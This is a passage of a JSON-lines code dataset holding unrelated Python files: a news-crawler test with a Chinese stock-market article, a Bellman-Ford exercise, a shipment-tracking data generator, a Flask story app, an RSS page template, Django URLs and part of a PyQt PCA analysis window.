半導體類股正當紅,台積電今天(24日)早盤衝關500元短暫達標後拉回,聯電延續昨天的強勢,在ADR飆漲超過20%助威下,股價漲幅超過7%,最高攻至39.7元,市值擠下股王大立光,繼續成為台股人氣王。因為聯電的狂飆,大盤儘管稍事休息,拉回的幅度也很有限。(張佳琪報導)台股週一的兩大支柱台積電、聯電,週二股價兩樣情,台積電挑戰500元大關,早盤開盤隨即攻頂,但是衝高後買盤追價謹慎,導致股價翻黑呈現小跌。聯電因週一股價漲停板鎖住,美國ADR強漲20.24%,帶動股價開盤後強勢走高,隨即衝過39元一路向上,攻至39.7元,股價又改寫18年新高,且追價買單積極,漲幅超過7%,市值擠下股王大立光。讓股價瞬間點火爆衝的關鍵是美系外資分析師最新出具的報告大力看好聯電。理由是受惠於5G、AI、高速運算等發展,聯電產用率將提高至90%到95%,因此,8吋晶圓價格調漲、12吋晶圓產用率提升,以及28奈米拓展有成,推估聯電明後年資本支出將達12億美元,重申「買進」評等,目標價由32元上調至54.5元。分析師表示,三大法人週一同步大買聯電,週二的漲勢,內外資應都有貢獻。至於是否漲到外資報告訂下的目標價,分析師認為,以今年聯電EPS預估2.25元推算,如果漲到54.5元,本益比落在24倍,雖然高但不至於離譜,因此認為如果外資買盤力道夠強,目標價就可能達標。(圖:雅虎奇摩)\\r\\n \",\n keywords=None,\n category=None,\n media=\"中國廣播公司\",\n datetime=\"2020/11/24 11:26 報導\",\n link=\"https://www.bcc.com.tw/newsView.4839712\",\n ),\n)\n\nTEST_DATA_LIST = [TEST_DATA_1, TEST_DATA_2]\n\n\n@pytest.fixture(scope=\"module\")\ndef newsCrawler():\n logger.warning(\"Init News Crawler ...\")\n return bcc.BCC()\n\n\n@pytest.mark.parametrize(\n argnames=\"name, link, expected_output\",\n argvalues=[tuple(t) for t in TEST_DATA_LIST],\n ids=[\n f\"{t.name}, {t.link[:50]+'...' 
if len(t.link) > 50 else t.link}\"\n for t in TEST_DATA_LIST\n ],\n)\ndef test_get_info(\n newsCrawler,\n name,\n link,\n expected_output,\n):\n output = newsCrawler.getInfo(link=link)\n assert NewsStruct.__2dict__(output) == NewsStruct.__2dict__(expected_output)\n","sub_path":"tests/media/test_bcc.py","file_name":"test_bcc.py","file_ext":"py","file_size_in_byte":4419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"597748810","text":"#!/usr/bin/python\n\nfrom graph_algorithms import *\nfrom structures import *\n\n\ng = Graph()\n\nfor i in ['A', 'B', 'C', 'D']:\n g.add_vertex(i)\n\ng.add_edge(2, 0, 1)\ng.add_edge(1, 0, 3)\ng.add_edge(2, 1, 3)\ng.add_edge(3, 2, 3)\n\ntry:\n Bellman_Ford(g, 0)\nexcept NegativeWeightCycle:\n print(\"run-time error: negative-weight cycle found\")\n","sub_path":"exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"543775918","text":"import hashlib\nfrom faker import Faker\nimport json\nimport random\nimport time\nfrom .. import views\nfrom ..models import Order, Information\n\n# -------------------------\n# --- Utility Functions ---\n# -------------------------\n\n# Return the hashed JSON and the actual JSON of the given dictionary\ndef get_item_hash(item):\n item_json = json.dumps(item, sort_keys=True)\n item_hash = hashlib.sha256()\n item_hash.update(item_json.encode())\n return item_hash.hexdigest(), item_json\n\n# Add item_hash to the blockchain and return the block the item_hash was stored in\ndef add_to_unconfirmed(item_hash):\n views.add_to_unconfirmed(item_hash)\n views.save_blockchain_to_file()\n return -1\n\n# ------------------------\n# --- Misc. 
Generators ---\n# ------------------------\n\n# Here we use the 'random' and 'Faker' modules to generate random data for use in tracking\n\ndef get_timestamp(previous_timestamp):\n return previous_timestamp + random.randint(5000, 100000)\n\ndef generate_address():\n fake = Faker()\n return fake.address().replace(\"\\n\", \", \")\n\n# Generate a random delivery method using weighted probabilities\ndef generate_delivery_method():\n methods = [(\"truck\", 0.5), (\"train\", 0.2), (\"boat/ship\", 0.2), (\"plane\", 0.1)]\n method_val = random.random()\n for method, prob in methods:\n if prob >= method_val:\n return method\n method_val -= prob\n\n# NOTE(brandon) - We may want to give the ability for customers to click on a shipping company and\n# see more detailed information about them, in which case we will need some sort of database of companies\ndef generate_shipping_company():\n fake = Faker()\n return fake.company()\n\n# NOTE(brandon) - Same note as for the shipping company\ndef generate_qa_company():\n fake = Faker()\n return fake.company()\n\n# Generate a fake temperature based on the product type.\ndef generate_temperature(product):\n product = product.lower()\n if product == \"milk\":\n return round(random.uniform(3, 7), 2)\n if product == \"yoghurt\":\n return round(random.uniform(3, 7), 2)\n if product == \"beef\":\n return round(random.uniform(0, 5), 2)\n return -1\n\n# Generate a fake quality rating and quality note based on the product type.\ndef generate_quality(product):\n\n product = product.lower()\n ratings = {\n \"very_bad\": {\n \"range\": [0.0, 3.0],\n \"notes\": {\n \"milk\": [\n \"Unhealthy amounts of bacteria were found\",\n \"Leaks found in bottles\",\n ],\n \"yoghurt\": [\n \"Algae found in yoghurt storage\",\n ],\n \"beef\": [\n \"Algae found in beef storage\"\n ]\n }\n },\n \"bad\": {\n \"range\": [3.0, 6.0],\n \"notes\": {\n \"milk\": [\n \"Milk hasn't been pasteurised completely\",\n ],\n \"yoghurt\": [\n \"Uneven consistency\",\n ],\n \"beef\": [\n \"Beef has been bruised in travel\"\n ]\n }\n },\n \"acceptable\": {\n \"range\": [6.0, 8.5],\n \"notes\": {\n \"milk\": [\n \"Dents found in bottle\",\n ],\n \"yoghurt\": [\n \"Malformed Containers\",\n ],\n \"beef\": [\n \"Beef fat has been torn\"\n ]\n }\n },\n \"good\": {\n \"range\": [8.5, 10.0],\n \"notes\": {\n \"milk\": [\n \"No issues\",\n ],\n \"yoghurt\": [\n \"No issues\",\n ],\n \"beef\": [\n \"No issues\"\n ]\n }\n },\n }\n\n quality_frequencies = [(\"very_bad\", 0.1), (\"bad\", 0.2), (\"acceptable\", 0.3), (\"good\", 0.4)]\n quality_roll = random.random()\n for quality, quality_prob in quality_frequencies:\n if quality_roll <= quality_prob:\n # Generate the random rating/note using the info in 'ratings'\n rating = round(random.uniform(ratings[quality][\"range\"][0], ratings[quality][\"range\"][1]), 1)\n note = random.choice(ratings[quality][\"notes\"][product])\n break\n quality_roll -= quality_prob\n\n return rating, note\n\n# -------------------------------------\n# --- Main Tracking Info Generators ---\n# -------------------------------------\n\n# Generate the next tracking item\ndef generate_next_item(previous_hash, previous_item_location, previous_state, previous_items, basic_order_info):\n\n # For each state, give the probabilities that it will be to each other state. 
This function\n # should never get called with previous_state = \"delivered\", it is just here for completeness.\n # The probabilities in the entry for each state should add up to 1.\n # NOTE(brandon): If we want to, we can use len(previous_items) to influence these parameters,\n # so that the item is less likely to keep bouncing between delivery stations\n state_transition = {\n \"order_placed\": [(\"order_received\", 1.0)],\n \"order_received\": [(\"sent_to_checkpoint\", 0.8), (\"sent_to_customer\", 0.2)],\n \"sent_to_checkpoint\": [(\"arrived_at_checkpoint\", 1.0)],\n \"arrived_at_checkpoint\": [(\"temperature_check\", 0.2), (\"quality_check\", 0.2), (\"temp_and_quality_check\", 0.1), (\"sent_to_checkpoint\", 0.15), (\"sent_to_customer\", 0.35)],\n \"temperature_check\": [(\"sent_to_checkpoint\", 0.5), (\"sent_to_customer\", 0.5)],\n \"quality_check\": [(\"sent_to_checkpoint\", 0.5), (\"sent_to_customer\", 0.5)],\n \"temp_and_quality_check\": [(\"sent_to_checkpoint\", 0.5), (\"sent_to_customer\", 0.5)],\n \"sent_to_customer\": [(\"delivered\", 1.0)],\n \"delivered\": [(\"delivered\", 1.0)],\n }\n\n # Use the state transition dict to generate the new state\n state_val = random.random()\n for new_state, prob in state_transition[previous_state]:\n if prob >= state_val:\n next_state = new_state\n break\n state_val -= prob\n \n # Create the tracking info\n order_info = {\n \"order_id\": previous_items[0].order_id,\n \"order_state\": next_state,\n \"time_stamp\": get_timestamp(previous_items[len(previous_items) - 1].time_stamp),\n \"previous_hash\": previous_hash,\n \"previous_block_loc\": previous_item_location\n }\n\n # --- Add additional info needed by different states ---\n\n # When the order is received, add the designated start point\n if next_state == \"order_received\":\n order_info[\"location\"] = generate_address()\n\n # When the order is sent, give the location it is being sent from/to, as well as information\n # about shipping. 
Use the previous tracking item to dictate the starting address\n if next_state == \"sent_to_checkpoint\" or next_state == \"sent_to_customer\":\n if (previous_items[len(previous_items) - 1].location != \"NULL\"):\n order_info[\"start_location\"] = previous_items[len(previous_items) - 1].location\n else:\n order_info[\"start_location\"] = previous_items[len(previous_items) - 1].end_location\n if next_state == \"sent_to_checkpoint\":\n order_info[\"end_location\"] = generate_address()\n else:\n order_info[\"end_location\"] = basic_order_info.delivery_address\n order_info[\"delivery_method\"] = generate_delivery_method()\n order_info[\"shipping_company\"] = generate_shipping_company()\n\n \n # NOTE(brandon) - We may also want to add in more shipping info such as truck temperature\n \n # When the order has arrived (or been delivered), we just need the information from the last tracking item\n if next_state == \"arrived_at_checkpoint\" or next_state == \"delivered\":\n order_info[\"start_location\"] = previous_items[len(previous_items) - 1].start_location\n order_info[\"end_location\"] = previous_items[len(previous_items) - 1].end_location\n order_info[\"delivery_method\"] = previous_items[len(previous_items) - 1].delivery_method\n order_info[\"shipping_company\"] = previous_items[len(previous_items) - 1].shipping_company\n \n # For a temperature checking station, we use the location from the last tracking item as well\n # as a company that is doing the assessing\n if next_state == \"temperature_check\":\n order_info[\"location\"] = previous_items[len(previous_items) - 1].end_location\n order_info[\"temperature\"] = generate_temperature(basic_order_info.product_name)\n order_info[\"qa_company\"] = generate_qa_company()\n\n # Quality checking station is mostly the same as above, but we generate a rating and a note\n if next_state == \"quality_check\":\n order_info[\"location\"] = previous_items[len(previous_items) - 1].end_location\n order_info[\"quality_rating\"], order_info[\"quality_note\"] = generate_quality(basic_order_info.product_name)\n order_info[\"qa_company\"] = generate_qa_company()\n\n # Temperature and quality checking station combines the above two\n if next_state == \"temp_and_quality_check\":\n order_info[\"location\"] = previous_items[len(previous_items) - 1].end_location\n order_info[\"temperature\"] = generate_temperature(basic_order_info.product_name)\n order_info[\"quality_rating\"], order_info[\"quality_note\"] = generate_quality(basic_order_info.product_name)\n order_info[\"qa_company\"] = generate_qa_company()\n\n return order_info\n\ndef add_first_tracking_item(order):\n\n # The first tracking state will be when the order is placed. 
This will be used to show a record\n # that the order was placed at a certain time.\n order_place = {\n \"order_id\": order.id,\n \"order_state\": \"order_placed\",\n \"time_stamp\": get_timestamp(int(time.time())),\n \"user\": order.user,\n \"product_name\": order.product_name,\n \"producer_name\": order.producer_name,\n \"quantity\": order.quantity,\n \"delivery_address\": order.delivery_address\n }\n\n item_hash, hashed_text = get_item_hash(order_place)\n item_location = add_to_unconfirmed(item_hash)\n\n order_place[\"hash\"] = item_hash\n order_place[\"hashed_text\"] = hashed_text\n order_place[\"block_loc\"] = item_location\n\n views.add_database(**order_place)\n\ndef add_next_tracking_item(order_id):\n\n basic_order_info = Order.objects.get(id=order_id)\n tracking_items = Information.objects.filter(order_id=order_id).order_by('time_stamp')\n\n previous_state = tracking_items[len(tracking_items) - 1].order_state\n \n # Don't generate a new item if the order has already been delivered\n if previous_state == \"delivered\":\n return\n\n previous_hash = tracking_items[len(tracking_items) - 1].hash\n previous_location = tracking_items[len(tracking_items) - 1].block_loc\n current_item = generate_next_item(previous_hash, previous_location, previous_state, tracking_items, basic_order_info)\n \n item_hash, hashed_text = get_item_hash(current_item)\n item_location = add_to_unconfirmed(item_hash)\n views.broadcast_tx(item_hash)\n current_item[\"hash\"] = item_hash\n current_item[\"hashed_text\"] = hashed_text\n current_item[\"block_loc\"] = item_location\n \n views.add_database(**current_item)\n return current_item[\"order_state\"]\n\n# Continually generate tracking items until the 'delivered' state is reached\ndef generate_full_tracking(order_id):\n while (add_next_tracking_item(order_id) != \"delivered\"):\n pass","sub_path":"ResiBuyer/utils/tracking_info.py","file_name":"tracking_info.py","file_ext":"py","file_size_in_byte":11579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"416006993","text":"\"\"\"Added table: SurveyFiles\n\nRevision ID: 1315361d05e7\nRevises: 602b5a2889c\nCreate Date: 2015-05-29 09:40:10.793000\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '1315361d05e7'\ndown_revision = '602b5a2889c'\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n\ndef upgrade():\n op.create_table('survey_files',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('Filename', sa.String(length=32), nullable=False),\n sa.Column('Timemark', sa.DateTime(), nullable=False),\n sa.PrimaryKeyConstraint('id'))\n\n\ndef downgrade():\n op.drop_table('survey_files')\n","sub_path":"migrations/versions/1315361d05e7_added_table_surveyfiles.py","file_name":"1315361d05e7_added_table_surveyfiles.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"36851628","text":"from flask import Flask, request, render_template, redirect\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom stories import stories, StoryList\n\n\napp = Flask(__name__)\n\n# the toolbar is only enabled in debug mode:\napp.debug = True\n\napp.config['SECRET_KEY'] = \"asdfasdfsdafdsfdasfaf\"\ndebug = DebugToolbarExtension(app)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef chose_story():\n \"\"\"Choose story from list and generate the story to ask words. 
\"\"\"\n if request.method == 'POST':\n storyId = int(request.form['story_id'])\n return render_template('story_form.html', stories = stories.values(), story = stories[storyId])\n else:\n return render_template('story_form.html', stories = stories.values(), story=None)\n\n\n@app.route('/story')\ndef story():\n \"\"\"Show story\"\"\"\n storyId = int(request.args[\"story_id\"])\n story = stories[storyId]\n story_text = story.generate(request.args)\n\n return render_template('story.html', story=story_text)\n\n\n@app.route(\"/story/new\", methods=['POST'])\ndef create_story():\n \"\"\" Create new story \"\"\"\n title = request.form[\"title\"]\n words = request.form.getlist('words')\n template = request.form[\"template\"]\n\n StoryList.createStory(title, words, template)\n\n return redirect(\"/\")\n\n\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"546756","text":"def getId(m,n):\n s = []\n for i in range(n):\n s.append(i)\n A = s.pop()\n B = s.pop()\n while s:\n if knows(A , B):\n A = s.pop()\n else:\n B = s.pop()\n if knows(A,B):\n c= B\n else:\n c = A\n for i in range(n):\n if (i != c) and (knows(c,i) or (not knows(i,c))) :\n return -1\n return c\n \n","sub_path":"Stack/The Celebrity Problem.py","file_name":"The Celebrity Problem.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"590065359","text":"from django.conf.urls import patterns, include, url\nfrom main_site.views import *\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'ukrainian_squad_info.views.home', name='home'),\n\n url(r'^$',index),\n url(r'^about$',about),\n url(r'^news/([0-9]+)?/$',news),\n\n url(r'^help$',help_all),\n url(r'^help/([0-9]+)?/$',help_item),\n\n # url(r'^blog/', include('blog.urls')),\n\n (r'^admin/', include(admin.site.urls)),\n (r'^grappelli/', include('grappelli.urls')),\n)\n","sub_path":"ukrainian_squad_info/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"29329196","text":"#!/usr/bin/python\nimport rss_db\nimport urllib2\nimport os\n\nclass layout:\n\tdef init(self,title,addr,desc,footer):\n\t\tself._TITLE = title\n\t\tself._ADDR = addr\n\t\tself._DESC = desc\n\t\tself._FOOTER = footer\n\t\tself._IMAGES = []\n\t\n\tdef __init__(self):\n\t\tself.init(\"default title\",\"default addr\",\"default desc\",\"default footer\")\n\t\n\tdef download(self,url,filename):\n\t\tif (os.path.exists(filename)):\n\t\t\treturn\n\t\tf = urllib2.urlopen(url)\n\t\tfout = open(filename,\"wb\")\n\t\tfout.write(f.read())\n\t\tfout.close()\n\t\tf.close()\n\t\t\n\tdef name(self):\n\t\treturn \"Default HTML Document\"\n\t\t\n\tdef get_refresh(self):\n\t\treturn \"\"\n\t\n\tdef get_menu(self,db):\n\t\tfeeds = db.read_allfeeds()\n\t\tretval = \"\"\n\t\tretval += \"\\\"home\\\"View 100 latest topics
\"\n\t\tfor item in feeds:\n\t\t\ttry:\n\t\t\t\timg = item[3].lower().replace(\" \",\"\") + \".ico\"\n\t\t\t\tif (item[4]):\n\t\t\t\t\tself.download(url=item[4],filename=\"tmp/\"+img)\n\t\t\t\tretval += \"\\\"\"+item[3]+\"\\\"\"+item[3]+\"
\"\n\t\t\t\tself._IMAGES.append(\"tmp/\"+img)\n\t\t\texcept TypeError:\n\t\t\t\tretval += \"\"+item[3]+\"
\"\n\t\treturn retval\n\t\t\n\tdef header(self,db=None):\n\t\tretval = \"\"\n\t\tretval += \"\\n\"\n\t\tretval += \"\\n\\n\"+self._TITLE+\"\"\n\t\tretval += \"\"\n\t\tretval += self.get_refresh()\n\t\tretval += \"\\n\\n\"\n\t\tretval += \"
\\n\"\n\t\tif db:\n\t\t\tretval += self.get_menu(db)\n\t\tretval += \"\\n\"\n\t\treturn retval\n\t\n\tdef footer(self):\n\t\tretval = \"\"\n\t\tretval += \"\\n\"\n\t\tretval += \"\\n\\n\\n\"\n\t\treturn retval\n\n\tdef content(self,feeds,db):\n\t\tretval = \"\"\n\t\tretval += \"\\n\"\n\t\tfor line in feeds:\n\t\t\tretval += \"\\n\"\n\t\t\tdate,title,url,feedid = line\n\t\t\tfeedname = db.read_feedname(feedid)\n\t\t\tfeedurl = db.read_feedurl(feedid)\n\t\t\tretval += \"\"\n\t\t\tretval += \"\"\n\t\t\tretval += \"\\n\\n\"\n\t\tretval += \"\"+title+\"\"\n\t\t\tretval += \"\"\n\t\t\tretval += feedname\n\t\t\tretval += \"\"\n\t\t\tretval += \"\"+date+\"\\n\"\n\t\treturn retval\n\t\t\n\tdef files(self):\n\t\tretval = []\n\t\tretval.append(\"templates/default/show.php\")\n\t\t#retval.append(\"templates/default/redirect.php\")\n\t\tretval.append(\"templates/default/style.css\")\n\t\tretval.append(\"templates/default/home.png\")\n\t\tfor image in self._IMAGES:\n\t\t\tretval.append(image)\n\t\treturn retval\n\n\tdef filename(self):\n\t\treturn \"index.php\"\n","sub_path":"rssreader/templates/default/structure.py","file_name":"structure.py","file_ext":"py","file_size_in_byte":2975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"220883663","text":"import json\n\ndef parse_vinnsl(vinnsl):\n\n    nn_structure = {}\n\n    parsed_json = json.loads(vinnsl)\n    parameters = parsed_json['parameters']['input']\n    structure = parsed_json['structure']\n\n    learning_rate = parameters[0]['defaultValue']\n    biasInput = parameters[1]['defaultValue']\n    biasHidden = parameters[2]['defaultValue']\n    momentum = parameters[3]['defaultValue']\n    activationFunctionOutput = parameters[4]['defaultValue']\n    activationFunctionHidden = parameters[5]['defaultValue']\n    threshold = parameters[6]['defaultValue']\n    target_data = parameters[7]['defaultValue']\n    number_epochs = parameters[8]['defaultValue']\n\n    connections = parsed_json['connections']\n\n    fully_connected = connections['fullyConnected']['isConnected']\n    shortcuts = connections['shortcuts']\n    shortcuts_connections = shortcuts['connections']\n\n    print(fully_connected)\n\n    input_layer = structure['inputLayer']\n    input_neurons = input_layer['amount']\n\n    outputLayer = structure['outputLayer']\n    output_neurons = outputLayer['amount']\n\n    hidden_layers = structure['hiddenLayer']\n    hidden_layers_neurons = []\n\n    for layer in hidden_layers:\n        hidden_layers_neurons.append(layer['amount'])\n\n    nn_structure['input_neurons'] = input_neurons\n    nn_structure['output_neurons'] = output_neurons\n    nn_structure['hidden_layers'] = hidden_layers_neurons\n\n    nn_structure['learning_rate'] = learning_rate\n    nn_structure['biasInput'] = biasInput\n    nn_structure['biasHidden'] = biasHidden\n    nn_structure['momentum'] = momentum\n    nn_structure['activationFunctionOutput'] = activationFunctionOutput\n    nn_structure['activationFunctionHidden'] = activationFunctionHidden\n    nn_structure['threshold'] = threshold\n    nn_structure['target_data'] = target_data\n    nn_structure['number_epochs'] = number_epochs\n\n    print(nn_structure)\n\n    return nn_structure","sub_path":"vinnsl_decoder.py","file_name":"vinnsl_decoder.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"307732290","text":"#\n# 2D L-world generation here.\n#\nimport random;\nimport numpy as np;\n\n\ndef paint(A, rewards, startX, offX, startY, offY, color, reward):\n    A[startX:startX + offX, startY:startY + offY] = color;\n    rewards[startX:startX + offX, startY:startY + offY] = reward\n\n\nclass ColorWorld:\n    # Constructor.\n    def __init__(self, w, h):\n        self.w = w;\n        self.h = h;\n\n        # Declare/Initialise other vairables here.\n\n    # Return an ndarray of 3 dimensions.( 3 colors. 
)\n def get_world(self):\n rand = random.random();\n grid = np.zeros((self.w, self.h, 3));\n rewards = np.zeros((self.w, self.h));\n\n if rand > 0.5:\n \"\"\"\n # left blue.\n grid[0][self.w-1] = (0, 0, 1);\n # right red.\n grid[self.h-1][0] = (1, 0, 0);\n # Middle yellow.\n start_w = self.w/2;\n end_w = self.w/2 + 1;\n start_h = self.h/2;\n end_h = self.h/2 + 1;\n paint( grid, start_h, 2, start_w, 2, (1,1,0) );\n \"\"\"\n\n # left red.\n # grid[0][self.w-1] = (0, 0, 1);\n paint(grid, rewards, 0, 4, self.w - 4, 4, (1, 0, 0), -4);\n # right blue.\n # grid[self.h - 1][0] = (1, 0, 0);\n paint(grid, rewards, self.h - 4, 4, 0, 4, (0, 0, 1), 1);\n # Middle yellow.\n paint(grid, rewards, self.h / 2, 4, self.w / 2, 4, (1, 1, 0), 0);\n\n else:\n # left blue.\n # grid[0][self.w-1] = (0, 0, 1);\n paint(grid, rewards, 0, 4, self.w - 4, 4, (0, 0, 1), 1);\n # right red.\n # grid[self.h - 1][0] = (1, 0, 0);\n paint(grid, rewards, self.h - 4, 4, 0, 4, (1, 0, 0), -4);\n # Middle green.\n paint(grid, rewards, self.h / 2, 4, self.w / 2, 4, (0, 1, 0), 0);\n\n return np.transpose(grid, [0, 1, 2]), rewards;\n","sub_path":"environment/color_world.py","file_name":"color_world.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"136102741","text":"# TASK 6\n\n# 1\na1 = input(\"Enter a string: \")\na2 = [a3 for a3 in a1 if a3.isupper() == 1]\nprint(a2)\n\n\n# 2\nstudents = ['Smit', 'Jaya', 'Rayyan']\nsubjects = ['CSE', 'Networking', 'Operating System']\npairs = {a4: a5 for (a4, a5) in zip(students, subjects)}\nprint(pairs)\n\n\n# 4\ndef rev(a8):\n strlen = len(a8)\n for a9 in range(strlen - 1, - 1, - 1):\n yield a8[a9]\n\n\na6 = input(\"Enter a string to reverse: \")\na10 = []\nfor lett in rev(a6):\n a10.append(lett)\na10 = ''.join(a10)\nprint(a10)\n\n\n# 5\ndef inc(x):\n return x + 1\n\n\ndef dec(x):\n return x - 1\n\n\ndef operate(func, x):\n result = func(x)\n return result\n\n\nr1 = operate(inc, 3)\nr2 = operate(dec, 3)\nprint(r1, r2)\n","sub_path":"py_tasks/Task6.py","file_name":"Task6.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"112311620","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nГлавное окно\n\"\"\"\n\nfrom PyQt4 import QtGui, uic, QtCore\nimport os.path\nimport SAID.data_handling as data_handling\nimport SAID.pca as pca\nfrom .constants import *\nfrom SAID.config import Config\nfrom .element import Element\nfrom .drawing import draw\n\nclass MyWindow(QtGui.QMainWindow):\n def __init__(self, qt_app):\n QtGui.QWidget.__init__(self, None)\n uic.loadUi('SAID/Files/SAID.ui', self)\n # присваиваем пути сохранения файла\n self.config = Config()\n self.set_language(self.config.lang) # переписываем элементы интерфейса на выбранный язык\n # связываем события со слотами\n self.connect(self.action_open_file, QtCore.SIGNAL('triggered()'), QtCore.SLOT('open_file()'))\n self.connect(self.action_save_file, QtCore.SIGNAL('triggered()'), QtCore.SLOT('save_file()'))\n self.connect(self.action_exit, QtCore.SIGNAL('triggered()'), QtCore.SLOT('close()'))\n self.connect(self.action_Qt, QtCore.SIGNAL('triggered()'), qt_app, QtCore.SLOT('aboutQt()'))\n self.connect(self.action_PCA_midpoint, QtCore.SIGNAL('triggered()'), lambda: self.runPCA(PCA_MIDPOINT))\n self.connect(self.action_PCA_vertex, QtCore.SIGNAL('triggered()'), lambda: self.runPCA(PCA_VERTEX))\n self.connect(self.action_draw_2D, QtCore.SIGNAL('triggered()'), lambda: 
self.drawing('2D'))\n self.connect(self.action_draw_3D, QtCore.SIGNAL('triggered()'), lambda: self.drawing('3D'))\n self.connect(self.set_lang_ru, QtCore.SIGNAL('triggered()'), lambda: self.set_language('ru'))\n self.connect(self.set_lang_de, QtCore.SIGNAL('triggered()'), lambda: self.set_language('de'))\n self.connect(self.set_lang_en, QtCore.SIGNAL('triggered()'), lambda: self.set_language('en'))\n # добавляем иконки\n self.action_exit.setIcon(QtGui.QIcon('SAID//Files//Icons//exit.png'))\n self.action_save_file.setIcon(QtGui.QIcon('SAID//Files//Icons//save.png'))\n self.action_open_file.setIcon(QtGui.QIcon('SAID//Files//Icons//open.png'))\n self.action_PCA_midpoint.setIcon(QtGui.QIcon('SAID//Files//Icons//startPCA.png'))\n self.action_PCA_vertex.setIcon(QtGui.QIcon('SAID//Files//Icons//startPCA2.png'))\n self.action_draw_2D.setIcon(QtGui.QIcon('SAID//Files//Icons//visualization2.png'))\n self.action_draw_3D.setIcon(QtGui.QIcon('SAID//Files//Icons//visualization3.png'))\n self.set_lang_ru.setIcon(QtGui.QIcon('SAID//Files//Icons//ru.png'))\n self.set_lang_de.setIcon(QtGui.QIcon('SAID//Files//Icons//de.png'))\n self.set_lang_en.setIcon(QtGui.QIcon('SAID//Files//Icons//en.png'))\n # кнопки на fileToolBar\n self.fileToolBar = self.addToolBar('')\n self.fileToolBar.addAction(self.action_open_file)\n self.fileToolBar.addAction(self.action_save_file)\n self.fileToolBar.addAction(self.action_exit)\n # присваиваем кнопки на mainToolBar\n self.mainToolBar = self.addToolBar('')\n self.mainToolBar.addAction(self.action_PCA_midpoint)\n self.mainToolBar.addAction(self.action_PCA_vertex)\n self.mainToolBar.addAction(self.action_draw_2D)\n self.mainToolBar.addAction(self.action_draw_3D)\n # присваиваем клавишные команды\n self.action_open_file.setShortcut('Ctrl+O')\n self.action_save_file.setShortcut('Ctrl+S')\n self.action_exit.setShortcut('Alt+X')\n # видимость элементов\n self.table.setVisible(False)\n self.action_save_file.setEnabled(False) # сохранять пока нечего\n self.action_PCA_midpoint.setEnabled(False) # и вызывать метод пока не для чего\n self.action_PCA_vertex.setEnabled(False)\n self.action_draw_2D.setEnabled(False)\n self.action_draw_3D.setEnabled(False)\n\n @QtCore.pyqtSlot()\n def open_file(self):\n path = QtGui.QFileDialog.getOpenFileName(directory = self.config.open_dir, filter = '*.csv')\n if path == '':\n return\n # сохраняем путь до файла\n self.config.open_dir = os.path.dirname(path)\n self.create_table(data_handling.loading(path))\n self.action_draw_2D.setEnabled(False)\n self.action_draw_3D.setEnabled(False)\n\n @QtCore.pyqtSlot()\n def save_file(self):\n path = QtGui.QFileDialog.getSaveFileName(directory = self.config.save_dir, filter = '*.csv')\n if path:\n # сохраняем путь до файла\n self.config.save_dir = os.path.dirname(path)\n # читаем данные\n table_model = self.table.model()\n data = []\n for row in range(table_model.rowCount()):\n data.append([table_model.takeVerticalHeaderItem(row).text()])\n for column in range(table_model.columnCount()):\n data[row].append(table_model.data(table_model.index(row, column)))\n data_handling.save_in_file(path, data)\n\n # главный обработчик событий\n def event(self, e):\n if e.type() == QtCore.QEvent.Close:\n # здесь выводим модульное окно поддтверждения выхода\n ret = QtGui.QMessageBox.question(self, 'Подтверждение действия', 'Вы уверены что хотите выйти?', 'Да', 'Нет')\n if ret == 1: # отменили выход\n e.ignore()\n return\n # сохраняем наш конфиг\n self.config.save()\n return QtGui.QWidget.event(self, e) # отправляем\n\n # отрисовка 
таблицы\n def create_table(self, elements):\n data = self.set_table_model([el.coordinates for el in elements], [el.header for el in elements])\n # после создания модели создаём таблицу под неё\n self.table.setGeometry(QtCore.QRect(0, 0, 800, 600-self.fileToolBar.geometry().height()-self.menubar.geometry().height()))\n self.table.setModel(data)\n self.table.setVisible(True)\n self.action_save_file.setEnabled(True)\n self.action_PCA_midpoint.setEnabled(True)\n self.action_PCA_vertex.setEnabled(True)\n # если всё успешно - сохраняем набор точек(элементов)\n self.elements = elements\n\n @QtCore.pyqtSlot()\n def runPCA(self, method):\n \"\"\"\n Слот вызова МГК\n \"\"\"\n if method == pca.PCA_MIDPOINT and len(self.elements) < self.elements[0].dimensions_count:\n QtGui.QMessageBox.warning(self, 'Ошибка!', 'Число измерений > числа элеметнов', self.yes)\n pca.choice_PCA(self.elements, method) # вызываем МГК\n # переписываем данные в таблице\n if method == pca.PCA_MIDPOINT:\n self.set_table_model([el.pca_mid for el in self.elements], [el.header for el in self.elements], Element.get_fracs(PCA_MIDPOINT))\n elif method == pca.PCA_VERTEX:\n self.set_table_model([el.pca_ver for el in self.elements], [el.header for el in self.elements], 